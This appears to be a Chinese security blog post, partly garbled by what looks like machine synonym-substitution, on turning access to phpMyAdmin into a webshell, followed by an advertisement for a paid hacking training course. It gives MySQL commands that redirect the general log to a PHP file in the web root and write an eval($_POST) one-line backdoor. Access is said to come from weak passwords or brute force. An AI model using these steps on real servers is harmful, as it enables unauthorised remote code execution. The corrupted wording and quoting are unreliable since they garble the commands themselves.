概述
phpMyAdmin 是一个以PHP为根本,以Web-Base办法架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。
我这边经由弱口令,爆破,目录透露等路子已进入PhpMyadmin
网络有用信息
查看数据库路存放径
Select @@datadir;
成功获取数据库地址,这里呢凭自己履历来预测根目录吧。
在这里我就不详写了,我在这里也只是写个思路!
!
!
那么问题来了!
既然我们有了根目录,我们可以怎么写shell呢?
利用日志文件
mysql 5.0版本以上会创建日志文件,修正日志的全局变量,也可以getshell。但是也要对天生的日志有可读可写的权限。
(可以从信息网络得到,我们的Mysql版本是>5.0的)
查看日志状态
show variables like '%general%';
开启general时,所实行的sql语句都会涌如今.log文件。那么,如果修正general_log_file的值,所实行的sql语句会天生shell
开启日志读写
SET GLOBAL general_log='on'
既然开启了,那我们就来大略的Getshell
创建文件
SET GLOBAL general_log_file='C:/phpStudy/www/xxx.php'
对应就会天生123.php文件
那我们开始写一句话
SELECT '<?php eval($_POST[\公众cmd\"大众]);?>'
一句话木马天生在根目录,直接用蚁剑或者菜刀链接即可
这里我就不把shell截图出来了!
总结:这篇文章我也只是大略的提及一下思路,我之前也是由于没有根目录就算有了对方的phpmyadmin我依旧没办法getshell,以是我就写了这一篇文章,给各位在phpmyadmin getshell之路的大佬们。顺便推下自己的培训,内容如下。
本期培训招生限定15(现有3人)人,本期培训是安全第八区第七期培训
课程目录请联系下方卖力人获取!
或者后台回答培训获取
详情讯问渗透云条记培训部卖力人
问一问又不要钱!
培训模式:本期培训办法为分享屏幕进行培训,并且讲师会在私下进行一对一的问题辅导以及问题办理。
毕业条件:待讲师的学习课程全部学完并考试通过后须要在某src平台为自己赚取3000-5000元用度。
本期上风:本期培训适宜上班族及学生党,以是对韶光哀求并不严格,但是对学生学到的知识非常严格,每个学生学完一项技能后,讲师都会针对性的支配考试、考察,担保学生对每项技能可以达到学懂、理解的程度,并且因培训办法是分享屏幕,以是讲师会适量支配作业须要学生完胜利课担保学生可以不中途而费起到一个监督的浸染,并且培训有毕业条件可担保学生毕业后立即可以就业或者可以担保学生入行不会受饿。
培训周期:一样平常3-4个月,在大约3个月旁边即可独立挖洞赚取赏金。
培训价格:3500元一人,可分期。
常见问题解答:
问:身为学生党/演习生拿不出来3500元怎么办?
答:因本培训比较适宜上班族及学生党,以是已经考虑到学生党或者演习生一次性无法全款,以是支持分期模式首付2000,14天内还完剩下1500即可!
问:学完是否可以找到事情?
答:因本期培训是有毕业条件的,我们可以担保你顺利毕业后直接可以进行就业。
问:学的过程中碰到不懂的问题怎么办?
答:讲师时候在线为您解答您的问题,但是本期培训是分享屏幕,但是学生自己的学习能力以及学生的思维能力更主要,以是建议学生先自己探求答案,实在无法办理在联系讲师进行解答!
问:怕被骗咋搞?
答:安全第八区信息团队与渗透云条记安全团队是互助伙伴,本团队所推出的培训全由渗透云条记安全团队进行包管!
卖力人微旗子暗记
联系请备注:培训
